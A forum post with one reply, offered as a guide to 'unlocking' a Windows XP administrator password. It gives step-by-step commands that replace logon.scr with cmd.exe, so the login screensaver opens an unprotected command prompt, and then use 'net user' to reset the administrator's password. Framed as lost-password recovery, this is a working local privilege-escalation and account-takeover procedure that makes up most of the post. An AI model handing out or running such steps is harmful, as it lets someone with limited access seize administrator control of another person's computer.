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[GUIDE]how to unlock windows xp admin's password


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Hello guys, today i am gone to show you how you can unlock a windows xp user locked with password.

you just need an another user, ok lets start.


1»Log in with the another user inside windows xp

2»open cmd [start->run->cmd]




mkdir hackdir

copy logon.scr hackdirlogon.scr

copy cmd.exe hackdircmd.exe

del logon.scr

rename cmd.exe logon.scr



with this you have done :


Open the folder system32.

Created a folder named hackdir.

Copied the logon.scr file in the folder hackdir.

Copied the cmd.exe file in the folder hackdir.

You've deleted logon.scr from the system32 folder.

You have the cmd.exe file into logon.scr file

You've closed the DOS window.

Result of these orders is that you replaced the default Screensaver for Windows to cmd.exe. On the next boot, on user selection screen, you wait until you see the Screensaver[a DOS Window{cmd}], with out any protection.

When The DOS Window opened type the following command: net user <username Administrator> <a new password>

example: If the admin's username is "PLACE" and for code you want "123" »»» net user PLACE 123


now when u have changed the password..log in with admin's acc.


WARNING: do that only if u have rly locked out of your user!! NOT FOR FUN!


i have tested on my friend's computer[he locked out]

and work's fine..but do it at your own risk!


thanks  :D

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this is was using when i had xp and i had many accounts and i was the administator and i had lost my pass!now i have vista and i don't use it because i don't have many accounts but ty for the share!it is really usefull for the guyz who lost their pass with admin's account!

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